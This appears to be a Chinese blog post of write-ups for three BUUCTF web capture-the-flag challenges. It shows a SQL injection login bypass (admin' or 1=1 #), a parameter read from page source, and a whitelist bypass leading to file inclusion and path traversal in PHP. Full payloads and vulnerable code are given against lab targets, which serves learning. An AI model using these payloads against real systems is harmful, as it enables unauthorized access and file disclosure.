<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>BUUCTF-web-第一周 | Mkey的博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="题目：BUUCTF-web-[极客大挑战 2019]EasySQL题目：BUUCTF-web-[极客大挑战 2019]Havefun题目：BUUCTF-web-[HCTF 2018]WarmUp">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF-web-第一周">
<meta property="og:url" content="https://monkeyh0ck.github.io/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/index.html">
<meta property="og:site_name" content="Mkey的博客">
<meta property="og:description" content="题目：BUUCTF-web-[极客大挑战 2019]EasySQL题目：BUUCTF-web-[极客大挑战 2019]Havefun题目：BUUCTF-web-[HCTF 2018]WarmUp">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://monkeyh0ck.github.io/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/1.jpg">
<meta property="og:image" content="https://monkeyh0ck.github.io/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/2.png">
<meta property="og:image" content="https://monkeyh0ck.github.io/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/3.png">
<meta property="og:image" content="https://monkeyh0ck.github.io/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/4.png">
<meta property="og:image" content="https://monkeyh0ck.github.io/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/5.png">
<meta property="og:image" content="https://monkeyh0ck.github.io/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/6.png">
<meta property="article:published_time" content="2023-07-09T02:31:04.000Z">
<meta property="article:modified_time" content="2023-07-09T05:50:41.677Z">
<meta property="article:author" content="HOU">
<meta property="article:tag" content="web-security">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://monkeyh0ck.github.io/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/1.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Mkey的博客" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Mkey的博客</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://monkeyh0ck.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-BUUCTF-web-第一周" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/" class="article-date">
  <time class="dt-published" datetime="2023-07-09T02:31:04.000Z" itemprop="datePublished">2023-07-09</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      BUUCTF-web-第一周
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="题目：BUUCTF-web-极客大挑战-2019-EasySQL"><a href="#题目：BUUCTF-web-极客大挑战-2019-EasySQL" class="headerlink" title="题目：BUUCTF-web-[极客大挑战 2019]EasySQL"></a>题目：BUUCTF-web-<strong><strong>[极客大挑战 2019]EasySQL</strong></strong></h1><h1 id="题目：BUUCTF-web-极客大挑战-2019-Havefun"><a href="#题目：BUUCTF-web-极客大挑战-2019-Havefun" class="headerlink" title="题目：BUUCTF-web-[极客大挑战 2019]Havefun"></a>题目：BUUCTF-web-<strong><strong>[极客大挑战 2019]Havefun</strong></strong></h1><h1 id="题目：BUUCTF-web-HCTF-2018-WarmUp"><a href="#题目：BUUCTF-web-HCTF-2018-WarmUp" class="headerlink" title="题目：BUUCTF-web-[HCTF 2018]WarmUp"></a>题目：BUUCTF-web-<strong><strong>[HCTF 2018]WarmUp</strong></strong></h1><span id="more"></span>

<h1 id="题目：BUUCTF-web-极客大挑战-2019-EasySQL-1"><a href="#题目：BUUCTF-web-极客大挑战-2019-EasySQL-1" class="headerlink" title="题目：BUUCTF-web-[极客大挑战 2019]EasySQL"></a>题目：BUUCTF-web-<strong><strong>[极客大挑战 2019]EasySQL</strong></strong></h1><h2 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h2><h3 id="观察题目"><a href="#观察题目" class="headerlink" title="观察题目"></a>观察题目</h3><p>打开靶机后界面如下：</p>
<p><img src="/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/1.jpg" alt="image-1"></p>
<p>需要用户进行登录：既需要进行sql查询，注入类型为字符串注入</p>
<p>需测试sql语句的字符串的闭合方式</p>
<p>在用户名和密码输入admin并提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GET /check.php?username=admin&amp;password=admin HTTP/1.1</span><br><span class="line">Host: 9611ca2f-3862-48f6-9c53-dccd9eefbf33.node4.buuoj.cn:81</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://9611ca2f-3862-48f6-9c53-dccd9eefbf33.node4.buuoj.cn:81/</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure>

<p>发现请求头为GET</p>
<h3 id="测试字符串闭合方式"><a href="#测试字符串闭合方式" class="headerlink" title="测试字符串闭合方式"></a>测试字符串闭合方式</h3><p>对字符串闭合进行测试：在用户名处添加后缀</p>
<ol>
<li>admin”<ol>
<li>测试结果返回错误的用户名和密码</li>
</ol>
</li>
</ol>
<p><img src="/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/2.png" alt="image-2"></p>
<ol start="2">
<li>admin’<ol>
<li>测试结果返回sql报错<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#x27;admin&#x27;&#x27; at line 1</span><br></pre></td></tr></table></figure>
报错信息即可证明改题目字符串由<code>&#39;</code>闭合</li>
</ol>
</li>
</ol>
<h3 id="获取flag"><a href="#获取flag" class="headerlink" title="获取flag"></a>获取flag</h3><p>获取admin登录权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">admin&#x27; or 1=1 #</span><br><span class="line">GET /check.php?username=admin%27+or+1%3D1+%23&amp;password=admin</span><br><span class="line"></span><br><span class="line">&lt;#&gt; ：注释符，导致其后的内容被截断，从而绕过password</span><br><span class="line">&lt;or 1=1&gt; ：让where永远为真，绕过了username</span><br><span class="line">&lt;&#x27;&gt; ：闭合了username字符串，让其后的命令为sql语句而不是username字符串</span><br></pre></td></tr></table></figure>

<p>发出请求后，成功获得flag</p>
<p><img src="/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/3.png" alt="image-3"></p>
<h1 id="题目：BUUCTF-web-极客大挑战-2019-Havefun-1"><a href="#题目：BUUCTF-web-极客大挑战-2019-Havefun-1" class="headerlink" title="题目：BUUCTF-web-[极客大挑战 2019]Havefun"></a>题目：BUUCTF-web-<strong><strong>[极客大挑战 2019]Havefun</strong></strong></h1><h3 id="观察题目-1"><a href="#观察题目-1" class="headerlink" title="观察题目"></a>观察题目</h3><p>页面没有单纯的图片，没有有用信息。</p>
<p><img src="/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/4.png" alt="image-4"></p>
<p>查看一下网页源码，发现存在注释信息，如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--</span><br><span class="line">        $cat=$_GET[&#x27;cat&#x27;];</span><br><span class="line">        echo $cat;</span><br><span class="line">        if($cat==&#x27;dog&#x27;)&#123;</span><br><span class="line">            echo &#x27;Syc&#123;cat_cat_cat_cat&#125;&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">        --&gt;</span><br></pre></td></tr></table></figure>
<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><p>对注释内容进行分析</p>
<p><code>$cat = $_GET[&#39;cat&#39;];</code>：从get方法获取参数cat</p>
<p><code>if($cat==&#39;dog&#39;)&#123; echo &#39;Syc&#123;cat_cat_cat_cat&#125;&#39;;&#125;</code>：如果cat参数为<code>dog</code>显示特定变量。</p>
<p>由此得出用get方法请求，带参数cat，值为dog，会显示特殊信息，进行尝试。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://ed22c82b-8cf3-4b80-a301-54e74b378e9c.node4.buuoj.cn:81/?cat=dog</span><br></pre></td></tr></table></figure>

<p>成功获得flag</p>
<p><img src="/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/5.png" alt="image-5"></p>
<h1 id="题目：BUUCTF-web-HCTF-2018-WarmUp-1"><a href="#题目：BUUCTF-web-HCTF-2018-WarmUp-1" class="headerlink" title="题目：BUUCTF-web-[HCTF 2018]WarmUp"></a>题目：BUUCTF-web-<strong><strong>[HCTF 2018]WarmUp</strong></strong></h1><h3 id="观察题目-2"><a href="#观察题目-2" class="headerlink" title="观察题目"></a>观察题目</h3><p>打开页面，显示个大大的滑稽</p>
<p><img src="/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/6.png" alt="image-6"></p>
<p>查看源码，发现注释<code>&lt;!--source.php--&gt;</code></p>
<p>对source.php进行访问，页面显示以下内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">    class emmm</span><br><span class="line">    &#123;</span><br><span class="line">        public static function checkFile(&amp;$page)</span><br><span class="line">        &#123;</span><br><span class="line">            $whitelist = [&quot;source&quot;=&gt;&quot;source.php&quot;,&quot;hint&quot;=&gt;&quot;hint.php&quot;];</span><br><span class="line">            if (! isset($page) || !is_string($page)) &#123;</span><br><span class="line">                echo &quot;you can&#x27;t see it&quot;;</span><br><span class="line">                return false;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            if (in_array($page, $whitelist)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $_page = mb_substr(</span><br><span class="line">                $page,</span><br><span class="line">                0,</span><br><span class="line">                mb_strpos($page . &#x27;?&#x27;, &#x27;?&#x27;)</span><br><span class="line">            );</span><br><span class="line">            if (in_array($_page, $whitelist)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $_page = urldecode($page);</span><br><span class="line">            $_page = mb_substr(</span><br><span class="line">                $_page,</span><br><span class="line">                0,</span><br><span class="line">                mb_strpos($_page . &#x27;?&#x27;, &#x27;?&#x27;)</span><br><span class="line">            );</span><br><span class="line">            if (in_array($_page, $whitelist)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line">            echo &quot;you can&#x27;t see it&quot;;</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if (! empty($_REQUEST[&#x27;file&#x27;])</span><br><span class="line">        &amp;&amp; is_string($_REQUEST[&#x27;file&#x27;])</span><br><span class="line">        &amp;&amp; emmm::checkFile($_REQUEST[&#x27;file&#x27;])</span><br><span class="line">    ) &#123;</span><br><span class="line">        include $_REQUEST[&#x27;file&#x27;];</span><br><span class="line">        exit;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;;</span><br><span class="line">    &#125;  </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>发现另一个文件hint.php，对其进行访问，后返回结果告知我们的目标文件是<code>ffffllllaaaagggg</code>，那就对sorce.php的php代码进行分析</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag not here, and flag in ffffllllaaaagggg</span><br></pre></td></tr></table></figure>

<h3 id="分析代码"><a href="#分析代码" class="headerlink" title="分析代码"></a>分析代码</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(__FILE__);</span><br></pre></td></tr></table></figure>
<p>代表对php代码进行高亮显示，既将php代码显示在页面上，就是我们能看到的代码。</p>
<p>随后是一个类emm，这个类需要被调用，先跳过，查看哪里调用了这个类。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">if (! empty($_REQUEST[&#x27;file&#x27;])</span><br><span class="line">        &amp;&amp; is_string($_REQUEST[&#x27;file&#x27;])</span><br><span class="line">        &amp;&amp; emmm::checkFile($_REQUEST[&#x27;file&#x27;])</span><br><span class="line">    ) &#123;</span><br><span class="line">        include $_REQUEST[&#x27;file&#x27;];</span><br><span class="line">        exit;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;;</span><br><span class="line">    &#125;  </span><br></pre></td></tr></table></figure>

<p>这是程序运行的代码，对其进行分析：</p>
<p>如果file请求不为空，file请求时字符串并且满足emmm类的chekfile函数对file的检查，就运行file文件包含，否则显示图片，既我们看到的滑稽。</p>
<p>故需对emmm类的checkFile函数进行分析：3次白名单检测、 2次问好过滤、一次URL解码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">public static function checkFile(&amp;$page)</span><br><span class="line">        &#123;</span><br><span class="line">            $whitelist = [&quot;source&quot;=&gt;&quot;source.php&quot;,&quot;hint&quot;=&gt;&quot;hint.php&quot;];</span><br><span class="line">            if (! isset($page) || !is_string($page)) &#123;</span><br><span class="line">                echo &quot;you can&#x27;t see it&quot;;</span><br><span class="line">                return false;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            if (in_array($page, $whitelist)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $_page = mb_substr(</span><br><span class="line">                $page,</span><br><span class="line">                0,</span><br><span class="line">                mb_strpos($page . &#x27;?&#x27;, &#x27;?&#x27;)</span><br><span class="line">            );</span><br><span class="line">            if (in_array($_page, $whitelist)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $_page = urldecode($page);</span><br><span class="line">            $_page = mb_substr(</span><br><span class="line">                $_page,</span><br><span class="line">                0,</span><br><span class="line">                mb_strpos($_page . &#x27;?&#x27;, &#x27;?&#x27;)</span><br><span class="line">            );</span><br><span class="line">            if (in_array($_page, $whitelist)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line">            echo &quot;you can&#x27;t see it&quot;;</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p><code>$whitelist = [&quot;source&quot;=&gt;&quot;source.php&quot;,&quot;hint&quot;=&gt;&quot;hint.php&quot;];</code>：whitelist是白名单，白名单有一组关联数组，两个键，分别是source:source.php；hint:hint.php</p>
<p><code>if (! isset($page) || !is_string($page))</code>:如果变量page不存在或者不是字符串类型，就返回false</p>
<p><code>if (in_array($page, $whitelist)) </code>：page变量存在于whitelist数组中则返回true</p>
<p><code>mb_substr($page, 0, mb_strpos($page . &#39;?&#39;, &#39;?&#39;));</code>：mb_substr用于截取字符串的挺部分，截取<code>$page</code>从0到第一个<code>?</code></p>
<p><code>mb_strpos($page . &#39;?&#39;, &#39;?&#39;)</code>：mb_strpos函数用于查找第一个字符串中第一次出现特定字符的位置</p>
<p><code>$page . &#39;?&#39;</code>：应为这在<code>$page</code>变量后拼接<code>?</code>，让mb_strpos函数一定能返回真，如果page中没有就返回字符串长度。</p>
<p><code>$_page = urldecode($page);</code>：将变量进行url解码</p>
<p><code>$_page = mb_substr($_page, 0, mb_strpos($_page . &#39;?&#39;, &#39;?&#39;));</code>：对解码后的变量进行截取，截取0到第一个<code>?</code></p>
<h3 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h3><p><code>?file=source.php</code>：无滑稽图片显示，但php代码显示两边，既证明checkfile为true，并执行文件包含</p>
<p>这个payload在第一次检测通过，但是第一次白名单检测时通过没有意义，第一次白名单检测时通过，只能是source或hint，没法获得flag</p>
<p><code>source.php?</code>：没有滑稽图片，这就证明我们通过了checkfile检测，但是没有其他显示，也没有显示source.php的内容，既我们的文件路径不对，文件包含执行失败。</p>
<p>这个payload在第二次白名单检测时通过，但payload无效，无法获得flag</p>
<p><code>source.php%3F</code>：无滑稽图片显示</p>
<p>这个payload在第二次白名单检测时通过，因为服务器在获取url时会进行一次urldecode，%3f是？经过一次urlencode的结果</p>
<p><code>source.php%253f</code>：无滑稽图片显示</p>
<p>%253F是？经过两次urlencode的结果，这个payload在第三次白名单检测时通过</p>
<h3 id="获取flag-1"><a href="#获取flag-1" class="headerlink" title="获取flag"></a>获取flag</h3><p>经过测试以上类型可以通过checkfile函数的检查，执行文件包含</p>
<p>已知目标文件为ffffllllaaaagggg，为此构造payload</p>
<p><code>source.php?ffffllllaaaagggg</code>：绕过checkfile，但是无法攻击的，因为当前路径没有文件名是<code>source.php?ffffllllaaaagggg</code></p>
<p><code>source.php?/../ffffllllaaaagggg</code>：成功绕过checkfile，没有获得flag是因为ffffllllaaaagggg不在当前路径。php会将<code>source.php?/</code>看作是一个文件夹</p>
<p>对payload添加<code>../</code>返回上一级文件夹查找ffffllllaaaagggg文件所在的路径</p>
<p><code>source.php?/../../../../ffffllllaaaagggg</code>：经过多次测试，发现成功获取flag:<code>flag&#123;b3956397-0989-4cbf-9801-8f9e8c9a93af&#125;</code></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://monkeyh0ck.github.io/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/" data-id="clko11m5u0001h8v5aqosbzmw" data-title="BUUCTF-web-第一周" class="article-share-link">分享</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web-security/" rel="tag">web-security</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2023/07/14/BUUCTF-web-%E7%AC%AC%E4%BA%8C%E5%91%A8/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">前一篇</strong>
      <div class="article-nav-title">
        
          BUUCTF-web-第二周
        
      </div>
    </a>
  
  
    <a href="/2022/06/01/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">逻辑漏洞</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web-security/" rel="tag">web-security</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/ctf/" style="font-size: 10px;">ctf</a> <a href="/tags/web-security/" style="font-size: 20px;">web-security</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/07/">七月 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/06/">六月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">三月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/02/">二月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">一月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/12/">十二月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">十一月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">十月 2021</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/07/29/BUUCTF-web-%E7%AC%AC%E5%9B%9B%E5%91%A8/">BUUCTF-web-第四周</a>
          </li>
        
          <li>
            <a href="/2023/07/22/BUUCTF-web-%E7%AC%AC%E4%B8%89%E5%91%A8/">BUUCTF-web-第三周</a>
          </li>
        
          <li>
            <a href="/2023/07/14/BUUCTF-web-%E7%AC%AC%E4%BA%8C%E5%91%A8/">BUUCTF-web-第二周</a>
          </li>
        
          <li>
            <a href="/2023/07/09/BUUCTF-web-%E7%AC%AC%E4%B8%80%E5%91%A8/">BUUCTF-web-第一周</a>
          </li>
        
          <li>
            <a href="/2022/06/01/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/">逻辑漏洞</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 HOU<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>